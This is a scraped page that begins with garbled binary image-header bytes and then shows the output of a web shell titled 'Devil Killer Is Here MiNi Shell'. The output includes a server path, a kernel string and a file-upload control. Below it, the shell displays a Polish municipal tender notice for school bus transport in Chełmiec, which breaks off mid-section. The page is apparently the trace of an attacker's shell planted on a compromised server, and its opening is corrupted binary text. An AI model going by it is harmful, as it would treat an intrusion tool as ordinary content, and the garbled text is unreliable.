JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220722/0027299701-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Dowóz uczniów do szkół z terenu<br/>Gminy Chełmiec w roku szkolnym<br/>2022/2023 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gminny Zespół Edukacji w Chełmcu</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 120224637</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Papieska 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Chełmiec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">33-395</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">185480224</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">18548043</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@chelmiec.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.chelmiec.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dowóz uczniów do szkół z terenu<br/>Gminy Chełmiec w roku szkolnym<br/>2022/2023 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-75e9c7d6-09b1-11ed-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00272997</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-22</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00017844/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Dowóz uczniów do szkół z terenu Gminy Chełmiec w roku szkolnym 2022/2023</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/chelmiec <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/chelmiec</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">komunikacja w niniejszym postępowaniu odbywa się wyłącznie przy użyciu środków komunikacji<br/>elektronicznej, pliki należy opatrzyć: - kwalifikowanym podpisem elektronicznym; podpisem zaufanym, -<br/>lub podpisem osobistym</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Klauzula informacyjna z art. 13 RODO: Zgodnie z art.<br/>13ust.1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia<br/>2016roku wsprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w<br/>sprawieswobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne<br/>rozporządzenie oochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej RODO, informuję,<br/>że:1.administratorem Pani/Pana danych osobowych jest Gmina Chełmiec, ul. Papieska 2, 33-<br/>395Chełmiec2. Pana/Pani dane nie podlegają współ administrowaniu, 3. Zamawiający powołał<br/>inspektoraochrony danych osobowych, który jest dostępny pod adresem – email: iod@chelmiec.pl 4. Pani/Pana<br/>daneosobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO w celu związanym<br/>zpostępowaniem o udzielenie zamówienia publicznego nr postępowania: GZE.271.1.2021 pn. Dowóz uczniów do szkół z terenu Gminy Chełmiec w roku szkolnym 2022/2023<br/>cz. 1 Szkoła Podstawowa w Januszowej<br/>cz. 2 Szkoła Podstawowa w Wielogłowach – trasa 1<br/>cz. 3 Szkoła Podstawowa w Wielogłowach – trasa 2 (łączona)<br/>cz. 4 Szkoła Podstawowa Piątkowa odbiorcami Pani/Pana danych<br/>osobowych będą osoby lub podmioty,którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ust. 1ustawy Prawo zamówień publicznych, 6. Pani/Pana dane osobowe<br/>będą przechowywane, zgodnie zart. 78 ust. 1 ustawy Pzp,przez okres 4 lat od dnia zakończenia<br/>postępowania o udzieleniezamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czastrwania umowy; 7. obowiązek podania przez Panią/Pana danych<br/>osobowych bezpośrednio Pani/Panadotyczących jest wymogiem ustawowym określonym w przepisach<br/>ustawy Pzp, związanym z udziałem w niniejszym postępowaniu o udzielenie zamówienia publicznego;<br/>konsekwencje niepodaniaokreślonych danych wynikają z ustawy Pzp, 8. w odniesieniu do Pani/Pana<br/>danych osobowych decyzjenie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO, 9. posiada Pani/Pan:a) na podstawie art. 15RODO prawo dostępu do danych osobowych<br/>Pani/Pana dotyczących, b) napodstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych **, c) na podstawie art.18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych zzastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO<br/>***, d) prawo do wniesienia skargido Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna<br/>Pani/Pan, że przetwarzanie danychosobowych Pani/Pana dotyczących narusza przepisy RODO, 10.<br/>Wykonawca składa do ofertyoświadczenie zawarte w formularzu ofertowym w zakresie wypełnienia<br/>obowiązków informacyjnychprzewidzianych wart. 13 lub art. 14 RODO. 11. W przypadku gdy<br/>Wykonawca nie przekazuje danychosobowych innych niż bezpośrednio jego dotyczących lub zachodzi<br/>wyłączenie stosowania obowiązkuinformacyjnego,stosownie do art. 13 ust.4 lub art. 14 ust. 5 RODO<br/>treści oświadczenia Wykonawca nieskłada(usunięcie treści oświadczenia np. przez jego wykreślenie).<br/>** Wyjaśnienie: skorzystanie zprawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówieniapublicznego ani zmianą postanowień umowy w zakresie<br/>niezgodnym z ustawą Pzp oraz nie możenaruszać integralności protokołu oraz jego załączników.***<br/>Wyjaśnienie: prawo do ograniczeniaprzetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnieniakorzystania ze środków ochrony prawnej lub w celu ochrony praw<br/>innej osoby fizycznej lub prawnej,lub z uwagi na ważne względy interesu publicznego Unii Europejskiej<br/>lub państwa członkowskiego.Klauzula informacyjna z art. 13 RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani/Panu: a) w związku z art. 17 ust. 3lit.b,<br/>d lub e RODO prawo do usunięcia danych osobowych, b) prawo do przenoszenia danychosobowych, o<br/>którym mowa w art. 20 RODO, c) na podstawie art. 21 RODO prawo sprzeciwu, wobecprzetwarzania<br/>danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danychosobowych jest art.6 ust.<br/>1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">GZE.271.2.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa transportu dzieci i młodzieży w zakresie dowozu i odwozu do szkół z terenu gminy Chełmiec wraz z zapewnieniem im opieki podczas transportu, we wszystkie dni nauki szkolnej, zgodnie z kalendarzem roku szkolnego. Za dowóz rozumie się dowóz uczniów z wyznaczonego przystanku w miejscu zamieszkania do szkół i placówek oraz odwóz uczniów ze szkół i placówek na wyznaczony przystanek w miejscu zamieszkania. Dowóz uczniów do szkół będzie się odbywał w godzinach porannych, odwóz uczniów ze szkół w godzinach popołudniowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">60112000-6 - Usługi w zakresie publicznego transportu drogowego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 15.	W tym postępowaniu zamawiający przewiduje skorzystania z prawa opcji. Zamówienie z użyciem PRAWA OPCJI to zamówienie w ramach którego Zamawiający dopuszcza możliwość zwiększenia zamówienia podstawowego o dodatkową usługę, zgodnie z cenami wykazanymi przez Wykonawcę w Formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ, który zostanie złożony wraz z ofertą.<br/>16.	Zamawiający przewiduje możliwość skorzystania z prawa opcji polegającego na zleceniu dodatkowych usług transportu uczniów do szkół w drugim semestrze roku szkolnego 2022/2023 tj. od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 91 dni) na takich samych warunkach jak zawartych w pierwotnej umowie. <br/><br/>17.	W przypadku skorzystania z prawa opcji wynagrodzenie płatne będzie w wysokości wynikającej z wartości dokonanej opcji, na zasadach przewidzianych w niniejszej umowie dla zamówienia podstawowego.<br/><br/>18.	Skorzystanie z prawa opcji uzależnione będzie wyłącznie od potrzeb i możliwości finansowych Zamawiającego. Wykonawca nie ma roszczenia o wykonanie prawa opcji.<br/><br/>19.	Skorzystanie z prawa opcji następuje poprzez złożenie oświadczenia Zamawiającego o skorzystaniu z prawa opcji oraz poprzez zawarcie aneksu terminowego.<br/><br/>20.	Postanowienia SWZ odnoszące się do ZAMÓWIENIA PODSTAWOWEGO przedmiotu zamówienia znajdują odpowiednie zastosowanie do zamówienia objętego prawem opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-01-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Oferty zostaną ocenione na podstawie przyjętych kryteriów dla każdej z części z osobna.<br/> b) Zamawiający udzieli zamówienia temu Wykonawcy, którego oferta uzyska najwyższą ilość punktów w przyjętych kryteriach oceny ofert dla danej części, pod warunkiem, że oferta ta nie podlega odrzuceniu oraz z zastrzeżeniem możliwości przeprowadzenia negocjacji.<br/> c) Zamawiający poprawi w tekście oferty omyłki zgodnie z art. 223 ust. 2 uPzp.<br/> d) W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert, zgodnie z art. 223 ust. 1 uPzp.<br/> e) Zamawiający odrzuci ofertę, jeżeli wystąpią okoliczności wskazane w art. 226 ust. 1 uPzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w razie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa transportu dzieci i młodzieży w zakresie dowozu i odwozu do szkół z terenu gminy Chełmiec wraz z zapewnieniem im opieki podczas transportu, we wszystkie dni nauki szkolnej, zgodnie z kalendarzem roku szkolnego. Za dowóz rozumie się dowóz uczniów z wyznaczonego przystanku w miejscu zamieszkania do szkół i placówek oraz odwóz uczniów ze szkół i placówek na wyznaczony przystanek w miejscu zamieszkania. Dowóz uczniów do szkół będzie się odbywał w godzinach porannych, odwóz uczniów ze szkół w godzinach popołudniowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 15.	W tym postępowaniu zamawiający przewiduje skorzystania z prawa opcji. Zamówienie z użyciem PRAWA OPCJI to zamówienie w ramach którego Zamawiający dopuszcza możliwość zwiększenia zamówienia podstawowego o dodatkową usługę, zgodnie z cenami wykazanymi przez Wykonawcę w Formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ, który zostanie złożony wraz z ofertą.<br/>16.	Zamawiający przewiduje możliwość skorzystania z prawa opcji polegającego na zleceniu dodatkowych usług transportu uczniów do szkół w drugim semestrze roku szkolnego 2022/2023 tj. od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 91 dni) na takich samych warunkach jak zawartych w pierwotnej umowie. <br/><br/>17.	W przypadku skorzystania z prawa opcji wynagrodzenie płatne będzie w wysokości wynikającej z wartości dokonanej opcji, na zasadach przewidzianych w niniejszej umowie dla zamówienia podstawowego.<br/><br/>18.	Skorzystanie z prawa opcji uzależnione będzie wyłącznie od potrzeb i możliwości finansowych Zamawiającego. Wykonawca nie ma roszczenia o wykonanie prawa opcji.<br/><br/>19.	Skorzystanie z prawa opcji następuje poprzez złożenie oświadczenia Zamawiającego o skorzystaniu z prawa opcji oraz poprzez zawarcie aneksu terminowego.<br/><br/>20.	Postanowienia SWZ odnoszące się do ZAMÓWIENIA PODSTAWOWEGO przedmiotu zamówienia znajdują odpowiednie zastosowanie do zamówienia objętego prawem opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-01-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Oferty zostaną ocenione na podstawie przyjętych kryteriów dla każdej z części z osobna.<br/> b) Zamawiający udzieli zamówienia temu Wykonawcy, którego oferta uzyska najwyższą ilość punktów w przyjętych kryteriach oceny ofert dla danej części, pod warunkiem, że oferta ta nie podlega odrzuceniu oraz z zastrzeżeniem możliwości przeprowadzenia negocjacji.<br/> c) Zamawiający poprawi w tekście oferty omyłki zgodnie z art. 223 ust. 2 uPzp.<br/> d) W toku dokonywania badania i oceny ofert Zamawiający może żądać udzielenia przez Wykonawców wyjaśnień dotyczących treści złożonych przez nich ofert, zgodnie z art. 223 ust. 1 uPzp.<br/> e) Zamawiający odrzuci ofertę, jeżeli wystąpią okoliczności wskazane w art. 226 ust. 1 uPzp.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia pojazdu zastępczego w razie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest usługa transportu dzieci i młodzieży w zakresie dowozu i odwozu do szkół z terenu gminy Chełmiec wraz z zapewnieniem im opieki podczas transportu, we wszystkie dni nauki szkolnej, zgodnie z kalendarzem roku szkolnego. Za dowóz rozumie się dowóz uczniów z wyznaczonego przystanku w miejscu zamieszkania do szkół i placówek oraz odwóz uczniów ze szkół i placówek na wyznaczony przystanek w miejscu zamieszkania. Dowóz uczniów do szkół będzie się odbywał w godzinach porannych, odwóz uczniów ze szkół w godzinach popołudniowych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60112000-6 - Usługi w zakresie publicznego transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 15.	W tym postępowaniu zamawiający przewiduje skorzystania z prawa opcji. Zamówienie z użyciem PRAWA OPCJI to zamówienie w ramach którego Zamawiający dopuszcza możliwość zwiększenia zamówienia podstawowego o dodatkową usługę, zgodnie z cenami wykazanymi przez Wykonawcę w Formularzu ofertowym, stanowiącym załącznik nr 1 do SWZ, który zostanie złożony wraz z ofertą.<br/>16.	Zamawiający przewiduje możliwość skorzystania z prawa opcji polegającego na zleceniu dodatkowych usług transportu uczniów do szkół w drugim semestrze roku szkolnego 2022/2023 tj. od dnia 14.02.2023 r. do dnia 23.06.2023 r. (tj. 91 dni) na takich samych warunkach jak zawartych w pierwotnej umowie. <br/><br/>17.	W przypadku skorzystania z prawa opcji wynagrodzenie płatne będzie w wysokości wynikającej z wartości dokonanej opcji, na zasadach przewidzianych w niniejszej umowie dla zamówienia podstawowego.<br/><br/>18.	Skorzystanie z prawa opcji uzależnione będzie wyłącznie od potrzeb i możliwości finansowych Zamawiającego. Wykonawca nie ma roszczenia o wykonanie prawa opcji.<br/><br/>19.	Skorzystanie z prawa opcji następuje poprzez złożenie oświadczenia Zamawiającego o skorzystaniu z prawa opcji oraz poprzez zawarcie aneksu terminowego.<br/><br/>20.	Postanowienia SWZ odnoszące się do ZAMÓWIENIA PODSTAWOWEGO przedmiotu zamówienia znajdują odpowiednie zastosowanie do zamówienia objętego prawem opcji. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-09-01 do 2023-01-27</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje 